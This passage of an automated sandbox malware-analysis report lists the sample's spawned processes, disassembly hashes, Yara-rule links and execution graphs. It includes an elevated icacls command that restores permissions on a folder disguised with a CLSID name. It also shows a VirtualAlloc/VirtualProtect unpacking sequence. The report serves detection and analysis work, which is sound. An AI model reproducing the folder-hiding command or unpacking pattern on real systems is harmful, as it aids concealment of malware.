                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:24
                  Start time:08:20:04
                  Start date:06/12/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:25
                  Start time:08:20:05
                  Start date:06/12/2024
                  Path:C:\Windows\System32\icacls.exe
                  Wow64 process (32bit):false
                  Commandline:icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl
                  Imagebase:0x7ff633a60000
                  File size:39'424 bytes
                  MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:26
                  Start time:08:20:05
                  Start date:06/12/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Disassembly

                  Reset < >

                    Non-executed Functions

                    Function 03799CFA Relevance: 4.8, APIs: 3, Instructions: 340COMMON
                    Download Yara Rule
                    APIs
                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0379A057
                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0379A05D
                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0379A063
                    Memory Dump Source
                    • Source File: 00000000.00000002.2049758717.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3790000_ET5.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn
                    • String ID:
                    • API String ID: 3668304517-0
                    • Opcode ID: 5cd11c8f57aefbf4e978efb23c97d87aadef05c6180bfc30900a697b6c4ed259
                    • Instruction ID: 5b2243202d5e566461d5fbed7110e199a2849eb2277140a5f62800f3835d84d4
                    • Opcode Fuzzy Hash: 5cd11c8f57aefbf4e978efb23c97d87aadef05c6180bfc30900a697b6c4ed259
                    • Instruction Fuzzy Hash: B2B18C31918B4C8FEB54EF28D884AAEB7E1FBA9350F50571AE84AD7261DB709481CB41
                    Function 0379CDAA Relevance: 3.3, APIs: 2, Instructions: 338COMMON
                    Download Yara Rule
                    APIs
                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0379D0EF
                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0379D0F5
                    Memory Dump Source
                    • Source File: 00000000.00000002.2049758717.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3790000_ET5.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn
                    • String ID:
                    • API String ID: 3668304517-0
                    • Opcode ID: 94a887f789ff5ddcb093f0301a886daf5772482d6b96eb020e294c1a36146a2d
                    • Instruction ID: 849270cd903e11ba50313bb6ff63fc142532a242f3381eb637cafe78e3bccd8d
                    • Opcode Fuzzy Hash: 94a887f789ff5ddcb093f0301a886daf5772482d6b96eb020e294c1a36146a2d
                    • Instruction Fuzzy Hash: EEA18E31928F4C8BEB55EF2CD885AEAB7E1FB99350F10471BA48AD7254DB309481CB81
                    Function 03794B4E Relevance: 1.8, APIs: 1, Instructions: 343COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2049758717.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3790000_ET5.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6d789b65366662fea0c61f3f853abc17da2fc7c830dcada29da3dc287b9a8088
                    • Instruction ID: 89432631aee4fa57be4ad17c8898a962dce36ae4476e8019e724e2eec1a51f5e
                    • Opcode Fuzzy Hash: 6d789b65366662fea0c61f3f853abc17da2fc7c830dcada29da3dc287b9a8088
                    • Instruction Fuzzy Hash: 71A1A331618E0C8FDF58EF2CD4856ADB3E1FBA9310B04475BD44AE7251DA30E942C785
                    Function 037AD122 Relevance: 1.8, APIs: 1, Instructions: 321COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2049758717.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3790000_ET5.jbxd
                    Similarity
                    • API ID: _clrfp
                    • String ID:
                    • API String ID: 3618594692-0
                    • Opcode ID: bb3d50ccaa70714ca57f8e18558dc9f0eacc16d483a426df21245d113d691742
                    • Instruction ID: 34a62447bac6d5d17ac034806a2ed91daef23cd4a74d163dd060057136a52881
                    • Opcode Fuzzy Hash: bb3d50ccaa70714ca57f8e18558dc9f0eacc16d483a426df21245d113d691742
                    • Instruction Fuzzy Hash: 38B16931510A4DCFDBA8DF1CC89AB56B7E1FF89304F198699E859CB6A1C335E852CB01
                    Function 03797F32 Relevance: .4, Instructions: 446COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2049758717.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3790000_ET5.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e702905e188292895ab496ef014bc760e695e081b65edb76e1e23856c507ca6b
                    • Instruction ID: a2103522eaea65e7469882be9645247a1c53fac815cd67594c9962243b14fff7
                    • Opcode Fuzzy Hash: e702905e188292895ab496ef014bc760e695e081b65edb76e1e23856c507ca6b
                    • Instruction Fuzzy Hash: 9FE1A431928B8C8BDB45DF28D8955BAB3E1FFA9300F44571FE486D7150EB74A644C782
                    Function 037A701E Relevance: .2, Instructions: 250COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2049758717.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3790000_ET5.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9c6c09f31ddc09bea78bddde318276c838f0745ed6150f3c305ccb77a5701def
                    • Instruction ID: 31b84e6efe6952f1ea5b0c2603a94fbe20bdb0313339095f30e09b795ea51556
                    • Opcode Fuzzy Hash: 9c6c09f31ddc09bea78bddde318276c838f0745ed6150f3c305ccb77a5701def
                    • Instruction Fuzzy Hash: 9061F630A1CF9C4FDB2CEF6C984916ABBE5EBC8710F04475EE486C3155DA70A84286C2
                    Function 037A53EA Relevance: .2, Instructions: 219COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2049758717.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3790000_ET5.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a8e9395568328c1374589bad5e4f24ab0974f60651a83110b5ffd51f4435af96
                    • Instruction ID: b40649b03f322fe7bef30ba792f74956f7da107dcf08a903dafa136a23245788
                    • Opcode Fuzzy Hash: a8e9395568328c1374589bad5e4f24ab0974f60651a83110b5ffd51f4435af96
                    • Instruction Fuzzy Hash: F3510132718F0C8F9B1CEE6CD89857673D2E7ED321315832EE44AC7265DA74D8468781
                    Function 037960D2 Relevance: .1, Instructions: 91COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2049758717.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3790000_ET5.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b3bfdd2e48ad19d66b0e37b2c6738ec7b33e2acd157bee24fc1458e38cb5dc2f
                    • Instruction ID: 70554fbcda37581e06cb30b0afbf9b97c41fe5d6b395e9821bba88da4c388b1f
                    • Opcode Fuzzy Hash: b3bfdd2e48ad19d66b0e37b2c6738ec7b33e2acd157bee24fc1458e38cb5dc2f
                    • Instruction Fuzzy Hash: 9E2195317126054BE70CCE2EC89A975B3D6F7D9209B58C77EE15BCB397C93668038A48
                    Function 03795B42 Relevance: .1, Instructions: 64COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2049758717.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3790000_ET5.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 818b3c2bf741691b3b4d97ce965452ef50dff5a67fbb0249e4fef83404bb3482
                    • Instruction ID: 31bb911d99e042f6a006ee6ac6f85039aa31dc22542bd2e71ff6b206c9639d8f
                    • Opcode Fuzzy Hash: 818b3c2bf741691b3b4d97ce965452ef50dff5a67fbb0249e4fef83404bb3482
                    • Instruction Fuzzy Hash: 3711E5323108048FEB4DCF3DD98966973D6EB89314B18C3BDD51ACB256D6358503CB44
                    Function 037A0D62 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 460COMMON
                    Download Yara Rule
                    APIs
                    • __FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 037A0DBF
                      • Part of subcall function 037A3122: __GetUnwindTryBlock.LIBCMT ref: 037A3165
                      • Part of subcall function 037A3122: __SetUnwindTryBlock.LIBVCRUNTIME ref: 037A318A
                    • Is_bad_exception_allowed.LIBVCRUNTIME ref: 037A0E97
                    • __FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 037A10E5
                    • std::bad_alloc::bad_alloc.LIBCMT ref: 037A11F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2049758717.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3790000_ET5.jbxd
                    Similarity
                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                    • String ID: csm$csm$csm
                    • API String ID: 849930591-393685449
                    • Opcode ID: 108918def01c2ac3d9b7d3d29076d54d19053c4a9c7ba14f76529dd2783086c1
                    • Instruction ID: de3a402ee781d7071d04989a85b963ff8bd4f4ced3d63258a56c3c7eedf12a46
                    • Opcode Fuzzy Hash: 108918def01c2ac3d9b7d3d29076d54d19053c4a9c7ba14f76529dd2783086c1
                    • Instruction Fuzzy Hash: 60E18F30A18F488FEB14EF6CD4896A9B7E1FB99311F54075ED489DB251DB34E881CB82
                    Function 037A1232 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 462COMMON
                    Download Yara Rule
                    APIs
                    • Is_bad_exception_allowed.LIBVCRUNTIME ref: 037A13D0
                    • std::bad_alloc::bad_alloc.LIBCMT ref: 037A16F9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2049758717.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3790000_ET5.jbxd
                    Similarity
                    • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                    • String ID: csm$csm$csm
                    • API String ID: 3523768491-393685449
                    • Opcode ID: 44741fef4920e8016cbaa655631b12234c63bd922a043d493a0beaa3d2e65c1f
                    • Instruction ID: 5bc358c4be1c66d258ad65314ac651bdd9b37d15cabd8208e8d7c7f8cb84c4b9
                    • Opcode Fuzzy Hash: 44741fef4920e8016cbaa655631b12234c63bd922a043d493a0beaa3d2e65c1f
                    • Instruction Fuzzy Hash: D4E1D334518F488FEB14EF2CC4896A9BBE1FB99315F54476ED495CB252DB30E482CB82
                    Function 037A0632 Relevance: 7.9, APIs: 5, Instructions: 439COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2049758717.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3790000_ET5.jbxd
                    Similarity
                    • API ID: AdjustPointer
                    • String ID:
                    • API String ID: 1740715915-0
                    • Opcode ID: 85d2843c014daff7437528d10741e8f5ff4ca83c870dc17c53e8f2f83a3b4496
                    • Instruction ID: cfbf12f527bc9b00bb0dc97332896bd348d40b27c9eadafeb69be762118c0214
                    • Opcode Fuzzy Hash: 85d2843c014daff7437528d10741e8f5ff4ca83c870dc17c53e8f2f83a3b4496
                    • Instruction Fuzzy Hash: AFC1C331518F4A8FEB29EF2C8098275F2D0FBD9711B584F6ED88AC7255EA70D88187C5
                    Function 0379A416 Relevance: 7.8, Strings: 6, Instructions: 289COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2049758717.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3790000_ET5.jbxd
                    Similarity
                    • API ID:
                    • String ID: $($2$H$P!`$`
                    • API String ID: 0-2682688576
                    • Opcode ID: f3333863e6a630afb4b2bbe1aa5c2ac1bf4f02da6f8d2e8a3d59ac9fb3e9e479
                    • Instruction ID: 3b9192952ae38af187bf6f9928cbbdbb5e68def49d4e6c71d8bb705c7900018c
                    • Opcode Fuzzy Hash: f3333863e6a630afb4b2bbe1aa5c2ac1bf4f02da6f8d2e8a3d59ac9fb3e9e479
                    • Instruction Fuzzy Hash: 47C1F3B09087888FDBA5DF18D08879ABBE0FB99314F504A6ED8CDCB215DB705589CF46
                    Function 037A19A6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 294COMMON
                    Download Yara Rule
                    APIs
                    • _CallSETranslator.LIBVCRUNTIME ref: 037A1A61
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2049758717.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3790000_ET5.jbxd
                    Similarity
                    • API ID: CallTranslator
                    • String ID: MOC$RCC
                    • API String ID: 3163161869-2084237596
                    • Opcode ID: 444dbfe9f3f19db82e809d8395c94021d05aa1c46c0babb41f9330434da2b637
                    • Instruction ID: c88b4faba35f6c157d90e4c320f8e3265a5a0865068b58f31d492ca44196628b
                    • Opcode Fuzzy Hash: 444dbfe9f3f19db82e809d8395c94021d05aa1c46c0babb41f9330434da2b637
                    • Instruction Fuzzy Hash: 42A19230918F488FDB18EF6CD485AADBBE0FB99304F54465EE489C7161DB74E581CB82
                    Function 037A006A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMON
                    Download Yara Rule
                    APIs
                    • __except_validate_context_record.LIBVCRUNTIME ref: 037A0095
                    • _IsNonwritableInCurrentImage.LIBCMT ref: 037A012C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2049758717.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3790000_ET5.jbxd
                    Similarity
                    • API ID: CurrentImageNonwritable__except_validate_context_record
                    • String ID: csm
                    • API String ID: 3242871069-1018135373
                    • Opcode ID: 30ef7e2d36ee2c66795a7b7596056c8c55a2b8efc71cae2e964df3408ffd0b69
                    • Instruction ID: ca96c7b6efc5094d9f8239cd5a2b950cbc09c3ceeba2b4e7fd72d59bdd3c2a26
                    • Opcode Fuzzy Hash: 30ef7e2d36ee2c66795a7b7596056c8c55a2b8efc71cae2e964df3408ffd0b69
                    • Instruction Fuzzy Hash: 3B61D93061CF088BDF28EE5CD885A7873D5FBD4350F14466DE88AC7296EA74E8518785
                    Function 037A1736 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 233COMMON
                    Download Yara Rule
                    APIs
                    • _CallSETranslator.LIBVCRUNTIME ref: 037A17E1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2049758717.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3790000_ET5.jbxd
                    Similarity
                    • API ID: CallTranslator
                    • String ID: MOC$RCC
                    • API String ID: 3163161869-2084237596
                    • Opcode ID: 6ef9112c19f78de0e2e0f52c9465fb91f3cc3b7f319b326a9b0bcdb3e32a35b8
                    • Instruction ID: 559ef601f104b503caa2b7adeb208343d46ba0b14e84d65d03ec1c60736d1c30
                    • Opcode Fuzzy Hash: 6ef9112c19f78de0e2e0f52c9465fb91f3cc3b7f319b326a9b0bcdb3e32a35b8
                    • Instruction Fuzzy Hash: B7718F3051CB888FE728DF1CD4467AAB7E0FBD9315F444A5ED489C7211DB74A581CB86
                    Function 037A27F6 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON
                    Download Yara Rule
                    APIs
                    • __except_validate_context_record.LIBVCRUNTIME ref: 037A28A0
                    • _CreateFrameInfo.LIBVCRUNTIME ref: 037A28C9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2049758717.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3790000_ET5.jbxd
                    Similarity
                    • API ID: CreateFrameInfo__except_validate_context_record
                    • String ID: csm
                    • API String ID: 2558813199-1018135373
                    • Opcode ID: 06c119407accd39f8435343144e30bf6358969287a5cf68c59ee8460d9e456f2
                    • Instruction ID: 014f743bf73b81bd3d3f9b2070f152921b6be6ff29ec9f0127d546f038419668
                    • Opcode Fuzzy Hash: 06c119407accd39f8435343144e30bf6358969287a5cf68c59ee8460d9e456f2
                    • Instruction Fuzzy Hash: 1E5153B4518F489FD764EF2CC48966A77E1FBD9351F100A5EE489CB261DB30E842CB86

                    Execution Graph

                    Execution Coverage:59.2%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:0%
                    Total number of Nodes:11
                    Total number of Limit Nodes:1
                    execution_graph 89 3790650 90 3790665 89->90 95 3790620 VirtualAlloc 90->95 92 37906d0 96 37901b0 VirtualAlloc 92->96 95->92 97 379023b VirtualProtect 96->97 99 3790321 VirtualFree 97->99 102 379030c 97->102 100 3790347 VirtualFree VirtualAlloc 99->100 100->102 101 3790531 102->101 103 37904f9 VirtualProtect 102->103 103->102

                    Callgraph

                    Executed Functions

                    Function 037901B0 Relevance: 9.3, APIs: 6, Instructions: 317memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.4538050567.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3790000_ET5.jbxd
                    Similarity
                    • API ID: Virtual$AllocFreeProtect
                    • String ID:
                    • API String ID: 267585107-0
                    • Opcode ID: d4c2a8ca2ad52b1407480866e6e93688b0dc4b0e284f3aa7e09f2a5729c8ff95
                    • Instruction ID: f70d0e35a3ca11c78b8ec2d118b4b07814ac6a47d64dbaa01e540a907b5d02f0
                    • Opcode Fuzzy Hash: d4c2a8ca2ad52b1407480866e6e93688b0dc4b0e284f3aa7e09f2a5729c8ff95
                    • Instruction Fuzzy Hash: FFC1C874218A48CFDB84EF5CD498B6AB7E1FB98305F51495DF48AC7261DBB4E881CB02
                    Function 03790620 Relevance: 1.3, APIs: 1, Instructions: 13memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 34 3790620-3790644 VirtualAlloc
                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.4538050567.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3790000_ET5.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
                    • Instruction ID: 42c62d54d1ca80df244572d2250d49a4e48d2af1a4e11cc88891e319d730dc5d
                    • Opcode Fuzzy Hash: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
                    • Instruction Fuzzy Hash: C7C08C3060A2004BDB0C6B38D8A9B1B3AE0FB8C300FA0552DF18BC2290C97EC4828786

                    Executed Functions

                    Function 00007FF6FF5912FD Relevance: .0, Instructions: 4COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2415672602.00007FF6FF591000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FF590000, based on PE: true
                    • Associated: 0000000A.00000002.2415655400.00007FF6FF590000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 0000000A.00000002.2415695777.00007FF6FF5A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 0000000A.00000002.2415695777.00007FF6FFB9C000.00000004.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 0000000A.00000002.2416498820.00007FF6FFFB5000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 0000000A.00000002.2416517866.00007FF6FFFBD000.00000004.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 0000000A.00000002.2416517866.00007FF6FFFBF000.00000004.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 0000000A.00000002.2416545688.00007FF6FFFC0000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 0000000A.00000002.2416559793.00007FF6FFFC3000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ff6ff590000_j5ql5xzpbrfk9lvkq57d8xjw55zyt.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d92b2e36e32e242d3d26627d8420fc34f18325cbf1fffa5b1655a556a0966707
                    • Instruction ID: 79c0f110f6bf1083f8b210ff18d7cf7340614008fbcac5aeb2186e8d48481e63
                    • Opcode Fuzzy Hash: d92b2e36e32e242d3d26627d8420fc34f18325cbf1fffa5b1655a556a0966707
                    • Instruction Fuzzy Hash: BCB012B4E0524294E7082F01D88225C3720AB14B00F810530C93C433DADE7C50424710

                    Execution Graph

                    Execution Coverage:6.8%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:9.1%
                    Total number of Nodes:1714
                    Total number of Limit Nodes:10
                    execution_graph 9520 7ff70489ddaf 9521 7ff70489db86 9520->9521 9521->9520 9523 7ff70489e2e0 9521->9523 9526 7ff70489ccd9 fputwc fwprintf 9521->9526 9527 7ff70489d1bd 9521->9527 9524 7ff70489e301 9523->9524 9535 7ff70489ccd9 9523->9535 9526->9521 9533 7ff70489d20f 9527->9533 9528 7ff70489d373 9529 7ff70489d38c 9528->9529 9531 7ff70489ca90 fputwc 9528->9531 9532 7ff70489d3b3 9529->9532 9534 7ff70489ca90 fputwc 9529->9534 9531->9528 9532->9521 9533->9528 9546 7ff70489ca90 9533->9546 9534->9529 9536 7ff70489ccf1 9535->9536 9537 7ff70489cd06 9536->9537 9539 7ff70489cd53 9536->9539 9538 7ff70489cd2a fwprintf 9537->9538 9542 7ff70489cd31 9537->9542 9538->9542 9540 7ff70489ca90 fputwc 9539->9540 9541 7ff70489cd58 9539->9541 9540->9539 9543 7ff70489ca90 fputwc 9541->9543 9545 7ff70489cdab 9541->9545 9542->9524 9543->9541 9544 7ff70489ca90 fputwc 9544->9545 9545->9542 9545->9544 9547 7ff70489caa1 9546->9547 9548 7ff70489cab2 fputwc 9547->9548 9549 7ff70489cabc 9547->9549 9548->9549 9549->9533 9550 7ff7048a05b1 VirtualProtect 9551 7ff7048ab652 9550->9551 10391 7ff7048a06b1 GetLastError 9552 7ff70489c9b3 9554 7ff70489c382 9552->9554 9553 7ff70489ca67 9554->9552 9554->9553 9555 7ff70489b3e7 fputc 9554->9555 9555->9554 9556 7ff70489e1b5 9557 7ff70489e1bd localeconv 9556->9557 9559 7ff70489db86 9556->9559 9565 7ff7048a026c 9557->9565 9560 7ff70489e2e0 9559->9560 9561 7ff70489d1bd fputwc 9559->9561 9564 7ff70489ccd9 fputwc fwprintf 9559->9564 9562 7ff70489e301 9560->9562 9563 7ff70489ccd9 2 API calls 9560->9563 9561->9559 9563->9562 9564->9559 9566 7ff7048a0282 ___mb_cur_max_func ___lc_codepage_func 9565->9566 9567 7ff7048a027d 9565->9567 9568 7ff7048a02bb 9566->9568 9567->9566 9571 7ff7048a0150 9568->9571 9573 7ff7048a0170 9571->9573 9576 7ff7048a018c 9571->9576 9572 7ff7048a0254 9575 7ff7048a021f MultiByteToWideChar 9572->9575 9572->9576 9573->9572 9574 7ff7048a01df IsDBCSLeadByteEx 9573->9574 9573->9576 9578 7ff7048a01aa 9573->9578 9574->9572 9574->9578 9575->9576 9579 7ff7048a0244 _errno 9575->9579 9576->9559 9577 7ff7048a01c6 MultiByteToWideChar 9577->9576 9577->9579 9578->9576 9578->9577 9579->9576 10712 7ff7048a03ab ___mb_cur_max_func ___lc_codepage_func 10713 7ff7048a03da 10712->10713 10714 7ff7048a0150 4 API calls 10713->10714 10715 7ff7048a03f9 10714->10715 9589 7ff70489fd98 9592 7ff70489f663 9589->9592 9599 7ff70489f560 9592->9599 9595 7ff70489f68b 9605 7ff70489f605 9595->9605 9596 7ff70489f6ec malloc 9596->9595 9597 7ff70489f706 9596->9597 9600 7ff70489f573 EnterCriticalSection 9599->9600 9602 7ff70489f591 9599->9602 9600->9602 9601 7ff70489f5a4 InitializeCriticalSection InitializeCriticalSection 9601->9602 9602->9600 9602->9601 9603 7ff70489f5ec Sleep 9602->9603 9604 7ff70489f5fe 9602->9604 9603->9602 9604->9595 9604->9596 9606 7ff70489f625 9605->9606 9607 7ff70489f60e LeaveCriticalSection 9605->9607 9606->9597 9607->9606 11029 7ff70489749c 11030 7ff7048974fd 11029->11030 11031 7ff7048974bd 11029->11031 11034 7ff7048914e2 6 API calls 11030->11034 11032 7ff7048974c2 11031->11032 11033 7ff704897536 11031->11033 11036 7ff70489756f 11032->11036 11037 7ff7048974d6 strlen strlen 11032->11037 11035 7ff7048914e2 6 API calls 11033->11035 11039 7ff704897526 11034->11039 11035->11039 11038 7ff7048914e2 6 API calls 11036->11038 11037->11039 11038->11039 9617 7ff70489c59e 9618 7ff70489c5b4 9617->9618 9623 7ff70489c130 9618->9623 9620 7ff70489c382 9621 7ff70489ca67 9620->9621 9622 7ff70489b3e7 fputc 9620->9622 9622->9620 9624 7ff70489c141 9623->9624 9632 7ff70489b2d0 9624->9632 9627 7ff70489c193 9640 7ff70489c08a 9627->9640 9628 7ff70489c186 9636 7ff70489b5da 9628->9636 9631 7ff70489c191 9631->9620 9633 7ff70489b2ee 9632->9633 9646 7ff70489e4e0 9633->9646 9637 7ff70489b5f0 9636->9637 9762 7ff70489b4fe 9637->9762 9641 7ff70489c0ac 9640->9641 9774 7ff70489b721 9641->9774 9644 7ff70489b3e7 fputc 9645 7ff70489c118 9644->9645 9647 7ff70489e556 9646->9647 9648 7ff70489e6b4 9647->9648 9650 7ff70489f663 6 API calls 9647->9650 9663 7ff70489b3e1 9647->9663 9714 7ff70489e34c 9648->9714 9651 7ff70489e5ee 9650->9651 9652 7ff70489e6ac 9651->9652 9654 7ff70489e6e0 9651->9654 9710 7ff70489f717 9652->9710 9717 7ff70489e320 9654->9717 9656 7ff70489ee37 9659 7ff70489f803 6 API calls 9656->9659 9657 7ff70489ed9f 9657->9656 9679 7ff70489ee18 9657->9679 9724 7ff70489f949 9657->9724 9662 7ff70489ee44 9659->9662 9660 7ff70489f717 4 API calls 9660->9663 9668 7ff70489f949 6 API calls 9662->9668 9673 7ff70489ee5c 9662->9673 9663->9627 9663->9628 9665 7ff70489f717 4 API calls 9676 7ff70489f3c7 9665->9676 9666 7ff70489f949 6 API calls 9666->9656 9668->9673 9669 7ff70489eaae 9669->9660 9672 7ff70489f3de 9677 7ff70489f717 4 API calls 9672->9677 9674 7ff70489eee9 9673->9674 9743 7ff70489fa57 9673->9743 9681 7ff70489fa57 6 API calls 9674->9681 9685 7ff70489ef05 9674->9685 9675 7ff70489f717 4 API calls 9675->9679 9676->9669 9676->9672 9680 7ff70489f717 4 API calls 9676->9680 9677->9669 9679->9656 9679->9666 9680->9672 9681->9685 9682 7ff70489ef22 9683 7ff70489efdb 9682->9683 9686 7ff70489ef6e 9682->9686 9684 7ff70489efe6 9683->9684 9693 7ff70489f2cd 9683->9693 9687 7ff70489eff7 9684->9687 9689 7ff70489fa57 6 API calls 9684->9689 9685->9682 9749 7ff70489f763 9685->9749 9691 7ff70489f763 6 